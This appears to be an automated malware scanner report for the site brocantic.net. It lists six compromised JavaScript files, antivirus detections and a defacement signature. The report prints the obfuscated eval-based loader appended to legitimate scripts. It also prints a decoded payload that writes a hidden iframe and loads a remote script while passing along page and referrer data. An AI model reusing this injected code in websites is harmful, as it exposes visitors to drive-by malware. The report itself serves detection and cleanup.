New scan:

Malware Scanner report for brocantic.net

Malicious/Suspicious/Total urls checked
6/0/9
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

!--Hacked by --  (367 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://brocantic.net/
200 OK
Content-Length: 169992
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: !--Hacked by --

<!--Hacked by -->





<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="" />...[209066 bytes skipped]...


http://brocantic.net/media/system/js/caption.js
200 OK
Content-Length: 3307
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 1834 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

Ikarus
JS.Trojan.JS.Iframe
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Kaspersky
HEUR:Trojan.Script.Iframer
MicroWorld-eScan
Trojan.JS.Iframe.DBV
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net//modules/mod_ccnewsletter/assets/highslide-with-html.js/
404 Not Found
Content-Length: 959
Content-Type: text/html
clean
http://brocantic.net/test404page.js
404 Not Found
Content-Length: 959
Content-Type: text/html
clean
http://brocantic.net/templates/ja_larix/scripts/ja.script.js
200 OK
Content-Length: 7330
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

window.addEvent('domready', function(){
var vm_inputs = getElementsByClass ("addtocart_button", null, "INPUT");
var vm_inputs1 = getElementsByClass ("addtocart_button_module", null, "INPUT");
if ((!vm_inputs || !vm_inputs.length) && (!vm_inputs1 || !vm_inputs1.length)) return;
for (var i=0; i<vm_inputs.length; i++)
{
var vm_input = vm_inputs[i];
vm_input.value = "";
}

if (!vm_inputs1 || !vm_inputs1.length) return;
for (var i=
... 3410 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Iframer
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
Commtouch
JS/IFrame.SJ.gen

http://brocantic.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js
200 OK
Content-Length: 2744
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

sfHover = function() {
var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li");
for (var i=0; i<sfEls.length; ++i) {
sfEls[i].onmouseover=function() {
clearTimeout(this.timer);
if(this.className.indexOf("sfhover") == -1)
this.className+="sfhover";
}
sfEls[i].onmouseout=function() {
this.timer = setTimeout(sfHoverOut.bind(this), 20);
}
}
}
function sfHoverOut() {
clearTimeout(this.timer);

... 1280 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Decoded script:


function () {
var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li");
for (var i = 0; i < sfEls.length; ++i) {
sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf("sfhover") == -1) {this.className += "sfhover";}};
sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);};
}
}
var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%2
... 623 bytes are skipped ...
/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script');
I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var O1O = document.getElementsByTagName('head')[0];
O1O.appendChild(I00);document.write(unescape(_escape));

Antivirus reports:

AVG
HTML/Framer

http://www.brocantic.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js
200 OK
Content-Length: 58597
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function loadNewPage( el, url ) {

var theEl = $(el);
var callback = {
success : function(responseText) {
theEl.innerHTML = responseText;
if( Lightbox ) Lightbox.init();
}
}
var opt = {
method: 'get',
onComplete: callback.success
}
new Ajax( url + '&only_page=1', opt ).request();
}
function handleGoToCart() { document.location = live_site + '/index.php?option=com_virtuemart&page=shop.cart&
... 3381 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
JS.Trojan.JS.Iframe
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js
200 OK
Content-Length: 7727
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JS_Slider = new Class({

initialize: function(options)
{
this.element = this.element || null;
this.options = Object.extend({
w: 100,
h: 200,
num_elem: 4,
total: 0,
url: '',
mode: 'horizontal',
direction: 'right',
wrapper: 'ja-slide-wrapper',
duration: 1000,
interval: 3000,
auto: 1
},options||{});
... 3376 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net/templates/ja_larix/scripts/vm_stuff.js
200 OK
Content-Length: 2288
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!--
feature_block = document.getElementById('ja-feature');
if (feature_block) {
anchors_feature = feature_block.getElementsByTagName('a');
for (i = 0; i<anchors_feature.length; ++i) {
if (anchors_feature[i].title.indexOf("Add to Cart") != -1) {
anchors_feature[i].className = "addtocart";
}
}
}

carts = document.getElementsByName('addtocart');
if (carts.length) {
for (i = 0; i<carts.length; ++i) {
carti =
... 1417 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: brocantic.net

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=brocantic.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brocantic.net/

Result: brocantic.net is not infected or malware details are not published yet.